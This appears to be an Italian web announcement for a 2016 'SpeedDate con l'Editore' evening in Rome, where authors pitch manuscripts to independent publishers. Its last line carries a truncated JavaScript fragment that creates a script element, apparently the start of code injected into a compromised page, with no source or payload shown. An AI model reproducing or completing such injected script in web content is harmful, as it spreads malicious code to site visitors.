25/02/2016: SpeedDate con l’Editore

SpeedDate con l'EditoreGiovedì 25 febbraio 2016 dalle 19.30 all’Enoteca Letteraria, un nuovo appuntamento con lo “SpeedDate con l’Editore”.

Chiunque abbia uno scritto nel cassetto (romanzo, raccolta di racconti o poesie) avrà a disposizione cinque minuti per raccontare la propria opera e altri cinque per leggerne un estratto, davanti ad una platea formata da editori indipendenti, scrittori e forti lettori. Protagonisti assoluti di questa serata dai toni colloquiali e semplici saranno le opere presentate, i loro autori e la curiosità degli ascoltatori in sala: a fine lettura verranno discussi i punti di forza e di debolezza degli scritti, anche al fine di capire quali sbocchi editoriali potrebbero avere.

Per partecipare, è necessario iscriversi tramite e-mail a speeddate@bellami.it, inviando il proprio nome, contatto e una breve descrizione della propria proposta letteraria. Leggeremo assieme poesia e narrativa, sceneggiature e pezzi teatrali e tutto quanto la vostra fantasia di autori vi abbia suggerito.
Per saperne di più…

Dove e Quando
Enoteca Letteraria
Via delle IV Fontane, 130 (Metro Barberini)
Giovedì 25 febbraio 2016 – ore 19:30

Costo della serata
Abbiamo stipulato una convenzione con Enoteca letteraria che ci dà la possibilità di usufruire della libreria per le nostre riunioni e di cenare (cena a buffet) al costo di 7,00€.

Maggiori informazioni e prenotazioni
speeddate@bellami.itvar d=document;var s=d.createElement(‘script’);